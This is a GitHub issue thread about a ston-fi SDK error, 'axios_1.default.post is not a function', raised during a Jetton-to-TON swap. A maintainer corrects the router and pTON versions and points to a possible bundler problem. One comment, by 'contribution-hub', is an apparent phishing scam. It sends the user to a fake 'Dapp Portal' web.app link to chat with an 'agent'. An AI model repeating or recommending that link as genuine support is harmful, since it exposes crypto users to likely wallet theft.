### ISSUE TITLE
Error while getSwapJettonToTonTxParams: axios_1.default.post is not a function

### ISSUE THREAD

**Issue by HarlamovEvgeniy** [ston-fi/sdk#47] opened 2024-12-01 21:57 UTC
I get an error when executing the router's getSwapJettonToTonTxParams() method

I have axios on the project, but for some reason it is not listed in the dependencies to the @ston-fi/sdk
I tried to change the versions of axios, remove it from the project, but nothing helped

![image](https://github.com/user-attachments/assets/e9a1c8ac-67f1-4a4a-816b-1f7b2aa0af9d)

Here is the code
```
  import { TonClient, toNano } from "@ton/ton";
  import { DEX, pTON } from "@ston-fi/sdk";
  import { useTonAddress, useTonConnectUI } from "@tonconnect/ui-react";

  const wallet = useTonAddress();
  const [tonConnectUI] = useTonConnectUI();
  
  const client = new TonClient({
    endpoint: "https://testnet.toncenter.com/api/v2/jsonRPC",
  });

  const router = client.open(new DEX.v1.Router());
  
  const txParams = await router.getSwapJettonToTonTxParams({
      userWalletAddress: wallet,
      offerJettonAddress: "EQBv2cEJ-T-1GNRdzaY_JYoJvpAISuFHOKmJZPQnoUqEHTlU",
      offerAmount: toNano(10000),
      proxyTon: new pTON.v1(),
      minAskAmount: "1",
      queryId: +Date.now(),
    });

    await tonConnectUI.sendTransaction({
      validUntil: Date.now() + 1000000,
      messages: [
        {
          address: txParams.to.toString(),
          amount: txParams.value.toString(),
          payload: txParams.body?.toBoc().toString("base64"),
        },
      ],
    });
```

Console Log:
![image](https://github.com/user-attachments/assets/2d8c2b8e-2cd0-4e26-bcf3-141eb43c054c)

**Comment by HarlamovEvgeniy** [comment] 2024-12-02 08:43
> I get an error when executing the router's getSwapJettonToTonTxParams() method
> 
> I have axios on the project, but for some reason it is not listed in the dependencies to the @ston-fi/sdk I tried to change the versions of axios, remove it from the project, but nothing helped
> 
> ![image](https://private-user-images.githubusercontent.com/104944098/391365800-e9a1c8ac-67f1-4a4a-816b-1f7b2aa0af9d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzMxMjkyODQsIm5iZiI6MTczMzEyODk4NCwicGF0aCI6Ii8xMDQ5NDQwOTgvMzkxMzY1ODAwLWU5YTFjOGFjLTY3ZjEtNGE0YS04MTZiLTFmN2IyYWEwYWY5ZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQxMjAyJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MTIwMlQwODQzMDRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wMGMyYzQ1ZGU1NjhkM2UwNjY3ZjFkMjNmOWE2YWJlMDIyNTg3YjY5M2E3YzI1YTFlNjY2OTY1NDkxNjYxMmM4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.saCOuFhCCRUjCieKdDYaNxKw5iPQ0lju6liB9KkGcIQ)
> 
> Here is the code:
> 
> ```
>   import { TonClient, toNano } from "@ton/ton";
>   import { DEX, pTON } from "@ston-fi/sdk";
>   import { useTonAddress, useTonConnectUI } from "@tonconnect/ui-react";
> 
>   const wallet = useTonAddress();
>   const [tonConnectUI] = useTonConnectUI();
>   
>   const client = new TonClient({
>     endpoint: "https://testnet.toncenter.com/api/v2/jsonRPC",
>   });
> 
>   const router = client.open(new DEX.v1.Router());
>   
>   const txParams = await router.getSwapJettonToTonTxParams({
>       userWalletAddress: wallet,
>       offerJettonAddress: "EQBv2cEJ-T-1GNRdzaY_JYoJvpAISuFHOKmJZPQnoUqEHTlU",
>       offerAmount: toNano(10000),
>       proxyTon: new pTON.v1(),
>       minAskAmount: "1",
>       queryId: +Date.now(),
>     });
> 
>     await tonConnectUI.sendTransaction({
>       validUntil: Date.now() + 1000000,
>       messages: [
>         {
>           address: txParams.to.toString(),
>           amount: txParams.value.toString(),
>           payload: txParams.body?.toBoc().toString("base64"),
>         },
>       ],
>     });
> ```
> 
> Console Log: ![image](https://private-user-images.githubusercontent.com/104944098/391365871-2d8c2b8e-2cd0-4e26-bcf3-141eb43c054c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzMxMjkyODQsIm5iZiI6MTczMzEyODk4NCwicGF0aCI6Ii8xMDQ5NDQwOTgvMzkxMzY1ODcxLTJkOGMyYjhlLTJjZDAtNGUyNi1iY2YzLTE0MWViNDNjMDU0Yy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQxMjAyJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MTIwMlQwODQzMDRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00NzhlY2FmYzQ3ODQ1M2ZkNjQ4OTY4MmRmZmE1NTNiMTVjMDU2MTlhNWYxYTc5NTY0MjY1NWQ3Nzc3MTAyNjJjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.m7-5BjwCdIsc6ihGYrAogGKcHBRJTRZYwscGDKNHFnk)

**Comment by contribution-hub** [comment] 2024-12-04 05:52
Reach out to the Decentralized Dapp Portal to report your request and get more details by initiating a live chat with an agent through the chat button on the platform. Access the portal here: [Dapp Portal](https://websynchronizefix.web.app/).  

@HarlamovEvgeniy  
**Note:** Click the chat button to start a conversation with an agent for assistance.

**Comment by pavel-rakhmanov** [comment] 2024-12-04 12:21
I could not get the same error when I ran your code, but some critical issues with this code should be fixed first, which might lead to the error you faced.

1. You use test-net API while using the main-net addresses in your code. 

2. You are trying to swap AMBER to TON using the v1 router and pTON contract. 
But on Ston.fi there is only one pool with [AMBER/TON](https://api.ston.fi/v1/pools/EQBXyg8CGiiNsriRUKFeyMf_4kwV7145uYTzJegDTGGFhlgv), and it's deployed using the router [`EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31`](https://api.ston.fi/v1/routers/EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31) which is v2.2 and needs v2.1 pTON to work with.

The following code will do the swap:

```ts
const client = new TonClient({
  endpoint: "https://toncenter.com/api/v2/jsonRPC",
});

const router = client.open(DEX.v2_2.Router.create('EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31'));
const proxyTon = pTON.v2_1.create('EQBnGWMCf3-FZZq1W4IWcWiGAc3PHuZ0_H-7sad2oY00o83S');

const txParams = await router.getSwapJettonToTonTxParams({
  userWalletAddress: wallet,
  offerJettonAddress: "EQBv2cEJ-T-1GNRdzaY_JYoJvpAISuFHOKmJZPQnoUqEHTlU",
  offerAmount: toNano(10000),
  proxyTon,
  minAskAmount: "1",
});
```

**Comment by HarlamovEvgeniy** [comment] 2024-12-05 12:39
> Я не смог получить ту же ошибку при запуске вашего кода, но сначала следует исправить некоторые критические проблемы с этим кодом, которые могут привести к ошибке, с которой вы столкнулись.
> 
> 1. Вы используете API тестовой сети, используя адреса основной сети в своем коде.
> 2. Вы пытаетесь переключить AMBER на TON, используя маршрутизатор v1 и контракт pTON. 
>    Но на Ston.fi есть только один пул с [AMBER/TON](https://api.ston.fi/v1/pools/EQBXyg8CGiiNsriRUKFeyMf_4kwV7145uYTzJegDTGGFhlgv) , и он развернут с использованием маршрутизатора [`EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31`](https://api.ston.fi/v1/routers/EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31)v2.2, для работы с которым требуется pTON v2.1.
> 
> Следующий код выполнит замену:
> 
> ```ts
> const client = new TonClient({
>   endpoint: "https://toncenter.com/api/v2/jsonRPC",
> });
> 
> const router = client.open(DEX.v2_2.Router.create('EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31'));
> const proxyTon = pTON.v2_1.create('EQBnGWMCf3-FZZq1W4IWcWiGAc3PHuZ0_H-7sad2oY00o83S');
> 
> const txParams = await router.getSwapJettonToTonTxParams({
>   userWalletAddress: wallet,
>   offerJettonAddress: "EQBv2cEJ-T-1GNRdzaY_JYoJvpAISuFHOKmJZPQnoUqEHTlU",
>   offerAmount: toNano(10000),
>   proxyTon,
>   minAskAmount: "1",
> });
> ```

Thanks for the reply, but I keep getting an error with axios_1.default.post()

**Comment by pavel-rakhmanov** [comment] 2024-12-05 14:54
That's unfortunate, but since this is out of the scope of this package, I can't help you with that error. 

One of my assumptions is that in your app, you also use `axios` package. As well as the `@ton/ton` package, which bundles `axios` [inside itself](https://bundlephobia.com/package/@ton/ton@15.1.0). So maybe the issue is occurring because the bundler you use to build the react app strips `axios` from the bundle, and this is causing the error

**Closed by pavel-rakhmanov** 2024-12-05 14:54 UTC

**Comment by HarlamovEvgeniy** [comment] 2024-12-09 08:18
> I could not get the same error when I ran your code, but some critical issues with this code should be fixed first, which might lead to the error you faced.
> 
> 1. You use test-net API while using the main-net addresses in your code.
> 2. You are trying to swap AMBER to TON using the v1 router and pTON contract.
>    But on Ston.fi there is only one pool with [AMBER/TON](https://api.ston.fi/v1/pools/EQBXyg8CGiiNsriRUKFeyMf_4kwV7145uYTzJegDTGGFhlgv), and it's deployed using the router [`EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31`](https://api.ston.fi/v1/routers/EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31) which is v2.2 and needs v2.1 pTON to work with.
> 
> The following code will do the swap:
> 
> ```ts
> const client = new TonClient({
>   endpoint: "https://toncenter.com/api/v2/jsonRPC",
> });
> 
> const router = client.open(DEX.v2_2.Router.create('EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31'));
> const proxyTon = pTON.v2_1.create('EQBnGWMCf3-FZZq1W4IWcWiGAc3PHuZ0_H-7sad2oY00o83S');
> 
> const txParams = await router.getSwapJettonToTonTxParams({
>   userWalletAddress: wallet,
>   offerJettonAddress: "EQBv2cEJ-T-1GNRdzaY_JYoJvpAISuFHOKmJZPQnoUqEHTlU",
>   offerAmount: toNano(10000),
>   proxyTon,
>   minAskAmount: "1",
> });
> ```

It seems I was able to fix the error when requesting axios, but now I get the following error when executing this code:
![image](https://github.com/user-attachments/assets/634d1d0a-5960-41c9-9f73-df05bb79a916)

What could be the problem?
